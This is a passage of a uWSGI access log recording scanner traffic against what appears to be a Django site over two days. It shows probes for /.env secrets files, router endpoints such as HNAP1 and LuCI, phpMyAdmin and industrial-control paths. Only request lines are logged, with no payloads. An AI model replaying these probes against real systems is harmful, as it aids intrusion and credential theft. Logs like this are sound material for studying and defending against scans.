179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 136/157] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 1 07:01:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 137/158] 49.228.19.29 () {32 vars in 469 bytes} [Tue Feb 1 07:04:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 138/159] 23.90.160.114 () {34 vars in 487 bytes} [Tue Feb 1 07:04:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 139/160] 167.94.145.58 () {28 vars in 310 bytes} [Tue Feb 1 07:04:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 140/161] 167.94.145.58 () {34 vars in 442 bytes} [Tue Feb 1 07:04:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 141/162] 128.14.209.162 () {34 vars in 488 bytes} [Tue Feb 1 07:06:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 142/163] 91.151.90.22 () {28 vars in 309 bytes} [Tue Feb 1 09:05:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 143/164] 91.151.90.22 () {40 vars in 662 bytes} [Tue Feb 1 09:05:44 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 144/165] 117.199.205.148 () {32 vars in 472 bytes} [Tue Feb 1 09:12:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 145/166] 183.136.225.56 () {34 vars in 456 bytes} [Tue Feb 1 10:07:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 146/167] 107.189.28.51 () {28 vars in 310 bytes} [Tue Feb 1 10:27:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 147/168] 107.189.28.51 () {40 vars in 671 bytes} [Tue Feb 1 10:27:18 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 148/169] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 1 11:05:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 149/170] 2.187.166.127 () {32 vars in 463 bytes} [Tue Feb 1 11:53:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 150/171] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 1 12:40:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 151/172] 162.142.125.210 () {30 vars in 402 bytes} [Tue Feb 1 13:09:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 152/173] 185.180.143.79 () {34 vars in 529 bytes} [Tue Feb 1 13:29:55 2022] GET /admin/index.php?login => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 348 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 153/174] 65.157.23.94 () {36 vars in 522 bytes} [Tue Feb 1 13:35:32 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 13/175] 65.157.23.94 () {40 vars in 629 bytes} [Tue Feb 1 13:35:32 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 154/176] 193.118.53.210 () {34 vars in 498 bytes} [Tue Feb 1 13:37:36 2022] GET /solr/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 155/177] 167.94.138.45 () {28 vars in 310 bytes} [Tue Feb 1 13:53:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 156/178] 167.94.138.45 () {34 vars in 442 bytes} [Tue Feb 1 13:53:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 157/179] 65.49.20.67 () {28 vars in 305 bytes} [Tue Feb 1 14:12:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 158/180] 35.233.62.116 () {42 vars in 564 bytes} [Tue Feb 1 15:19:37 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 159/181] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 1 15:59:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 160/182] 209.17.96.2 () {30 vars in 408 bytes} [Tue Feb 1 18:06:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 161/183] 47.100.9.91 () {34 vars in 600 bytes} [Tue Feb 1 18:29:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 162/184] 47.100.9.91 () {34 vars in 646 bytes} [Tue Feb 1 18:29:09 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 163/185] 47.100.9.91 () {34 vars in 612 bytes} [Tue Feb 1 18:29:09 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 164/186] 47.100.9.91 () {34 vars in 650 bytes} [Tue Feb 1 18:29:09 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 165/187] 47.100.9.91 () {36 vars in 710 bytes} [Tue Feb 1 18:29:09 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 166/188] 47.100.9.91 () {36 vars in 712 bytes} [Tue Feb 1 18:29:09 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 167/189] 47.100.9.91 () {36 vars in 742 bytes} [Tue Feb 1 18:29:09 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 168/190] 47.100.9.91 () {36 vars in 722 bytes} [Tue Feb 1 18:29:09 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 169/191] 47.100.9.91 () {36 vars in 740 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 170/192] 47.100.9.91 () {36 vars in 780 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 171/193] 47.100.9.91 () {36 vars in 750 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 172/194] 47.100.9.91 () {36 vars in 746 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 173/195] 47.100.9.91 () {36 vars in 758 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 174/196] 47.100.9.91 () {36 vars in 778 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 175/197] 47.100.9.91 () {36 vars in 742 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 176/198] 47.100.9.91 () {36 vars in 746 bytes} [Tue Feb 1 18:29:09 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 177/199] 47.100.9.91 () {36 vars in 712 bytes} [Tue Feb 1 18:29:09 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 178/200] 47.100.9.91 () {36 vars in 712 bytes} [Tue Feb 1 18:29:09 2022] GET /phpmyadmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 179/201] 47.100.9.91 () {36 vars in 698 bytes} [Tue Feb 1 18:29:09 2022] GET /wcm/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 180/202] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 1 18:46:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 181/203] 47.92.105.73 () {34 vars in 458 bytes} [Tue Feb 1 21:00:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 182/204] 116.233.200.101 () {26 vars in 299 bytes} [Tue Feb 1 21:22:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 14/205] 116.233.200.101 () {30 vars in 341 bytes} [Tue Feb 1 21:22:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 183/206] 116.233.200.101 () {30 vars in 341 bytes} [Tue Feb 1 21:22:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 184/207] 116.233.200.101 () {30 vars in 371 bytes} [Tue Feb 1 21:22:50 2022] GET /navigation.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 185/208] 116.233.200.101 () {30 vars in 341 bytes} [Tue Feb 1 21:22:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 186/209] 116.233.200.101 () {42 vars in 799 bytes} [Tue Feb 1 21:22:50 2022] POST /cgi-bin/luci/;stok=/locale?form=lang => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 187/210] 116.233.200.101 () {30 vars in 341 bytes} [Tue Feb 1 21:22:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 188/211] 116.233.200.101 () {30 vars in 341 bytes} [Tue Feb 1 21:22:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 189/212] 116.233.200.101 () {30 vars in 424 bytes} [Tue Feb 1 21:22:51 2022] GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 190/213] 116.233.200.101 () {30 vars in 365 bytes} [Tue Feb 1 21:22:52 2022] GET /KingViewWeb/ => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 1/214] 116.233.200.101 () {30 vars in 367 bytes} [Tue Feb 1 21:22:52 2022] GET /ifixwebspace/ => generated 179 bytes in 241 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 191/215] 116.233.200.101 () {30 vars in 367 bytes} [Tue Feb 1 21:22:53 2022] GET /webconfig.ini => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 192/216] 20.55.53.144 () {34 vars in 549 bytes} [Tue Feb 1 21:31:27 2022] GET /bNKloeSJ4DgpYaRTjz6vEWZ3Gkj => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 193/217] 200.126.102.227 () {32 vars in 466 bytes} [Tue Feb 1 21:40:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 194/218] 139.196.143.36 () {38 vars in 646 bytes} [Tue Feb 1 21:48:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 195/219] 139.196.143.36 () {38 vars in 692 bytes} [Tue Feb 1 21:48:09 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 196/220] 139.196.143.36 () {38 vars in 658 bytes} [Tue Feb 1 21:48:09 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 197/221] 139.196.143.36 () {38 vars in 695 bytes} [Tue Feb 1 21:48:09 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 198/222] 139.196.143.36 () {40 vars in 755 bytes} [Tue Feb 1 21:48:09 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 199/223] 139.196.143.36 () {40 vars in 757 bytes} [Tue Feb 1 21:48:09 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 200/224] 139.196.143.36 () {40 vars in 787 bytes} [Tue Feb 1 21:48:09 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 201/225] 139.196.143.36 () {40 vars in 767 bytes} [Tue Feb 1 21:48:09 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 15/226] 139.196.143.36 () {40 vars in 757 bytes} [Tue Feb 1 21:48:10 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 16/227] 139.196.143.36 () {40 vars in 757 bytes} [Tue Feb 1 21:48:10 2022] GET /phpmyadmin/ => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 17/228] 139.196.143.36 () {40 vars in 743 bytes} [Tue Feb 1 21:48:10 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 18/229] 36.66.158.7 () {32 vars in 461 bytes} [Tue Feb 1 21:52:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 19/230] 103.79.115.122 () {32 vars in 464 bytes} [Tue Feb 1 22:07:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 202/231] 47.252.35.224 () {34 vars in 411 bytes} [Tue Feb 1 22:25:39 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 20/232] 47.252.35.224 () {28 vars in 307 bytes} [Tue Feb 1 22:25:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 21/233] 47.252.35.224 () {32 vars in 409 bytes} [Tue Feb 1 22:25:40 2022] GET /text4041643754338 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 203/234] 47.252.35.224 () {32 vars in 395 bytes} [Tue Feb 1 22:25:41 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 204/235] 47.252.35.224 () {32 vars in 385 bytes} [Tue Feb 1 22:25:41 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 205/236] 47.252.35.224 () {36 vars in 463 bytes} [Tue Feb 1 22:25:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 206/237] 47.252.35.224 () {34 vars in 414 bytes} [Tue Feb 1 22:25:56 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 207/238] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 1 22:49:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 208/239] 128.14.209.250 () {30 vars in 442 bytes} [Tue Feb 1 23:27:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 22/240] 106.14.220.97 () {34 vars in 603 bytes} [Wed Feb 2 00:20:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 209/241] 106.14.220.97 () {34 vars in 648 bytes} [Wed Feb 2 00:20:22 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 210/242] 106.14.220.97 () {34 vars in 614 bytes} [Wed Feb 2 00:20:22 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 211/243] 106.14.220.97 () {34 vars in 651 bytes} [Wed Feb 2 00:20:22 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 212/244] 106.14.220.97 () {36 vars in 712 bytes} [Wed Feb 2 00:20:22 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 213/245] 106.14.220.97 () {36 vars in 714 bytes} [Wed Feb 2 00:20:22 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 214/246] 106.14.220.97 () {36 vars in 744 bytes} [Wed Feb 2 00:20:22 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 215/247] 106.14.220.97 () {36 vars in 724 bytes} [Wed Feb 2 00:20:23 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 216/248] 106.14.220.97 () {36 vars in 742 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 217/249] 106.14.220.97 () {36 vars in 782 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 218/250] 106.14.220.97 () {36 vars in 752 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 219/251] 106.14.220.97 () {36 vars in 748 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 220/252] 106.14.220.97 () {36 vars in 760 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 221/253] 106.14.220.97 () {36 vars in 780 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 222/254] 106.14.220.97 () {36 vars in 744 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 9/255] 106.14.220.97 () {36 vars in 748 bytes} [Wed Feb 2 00:20:23 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 10/256] 106.14.220.97 () {36 vars in 714 bytes} [Wed Feb 2 00:20:23 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 11/257] 106.14.220.97 () {36 vars in 714 bytes} [Wed Feb 2 00:20:23 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 23/258] 106.14.220.97 () {36 vars in 700 bytes} [Wed Feb 2 00:20:23 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 223/259] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 00:37:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 224/260] 170.130.187.6 () {30 vars in 372 bytes} [Wed Feb 2 00:44:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 225/261] 79.172.90.55 () {32 vars in 469 bytes} [Wed Feb 2 00:48:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 226/262] 71.6.232.4 () {34 vars in 484 bytes} [Wed Feb 2 01:06:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 227/263] 183.136.225.56 () {34 vars in 535 bytes} [Wed Feb 2 01:24:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 228/264] 109.237.103.9 () {36 vars in 523 bytes} [Wed Feb 2 01:40:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 229/265] 132.145.39.16 () {36 vars in 432 bytes} [Wed Feb 2 01:45:29 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 230/266] 128.14.134.170 () {34 vars in 488 bytes} [Wed Feb 2 02:20:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 231/267] 101.132.64.234 () {38 vars in 646 bytes} [Wed Feb 2 02:56:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 232/268] 101.132.64.234 () {38 vars in 692 bytes} [Wed Feb 2 02:56:42 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 233/269] 101.132.64.234 () {38 vars in 658 bytes} [Wed Feb 2 02:56:42 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 234/270] 101.132.64.234 () {38 vars in 695 bytes} [Wed Feb 2 02:56:42 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 235/271] 101.132.64.234 () {40 vars in 755 bytes} [Wed Feb 2 02:56:42 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 236/272] 101.132.64.234 () {40 vars in 757 bytes} [Wed Feb 2 02:56:42 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 237/273] 101.132.64.234 () {40 vars in 787 bytes} [Wed Feb 2 02:56:42 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 238/274] 101.132.64.234 () {40 vars in 767 bytes} [Wed Feb 2 02:56:42 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 239/275] 101.132.64.234 () {40 vars in 757 bytes} [Wed Feb 2 02:56:42 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 240/276] 101.132.64.234 () {40 vars in 757 bytes} [Wed Feb 2 02:56:42 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 241/277] 101.132.64.234 () {40 vars in 743 bytes} [Wed Feb 2 02:56:43 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 242/278] 45.248.42.81 () {32 vars in 463 bytes} [Wed Feb 2 03:08:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 243/279] 106.15.197.115 () {38 vars in 646 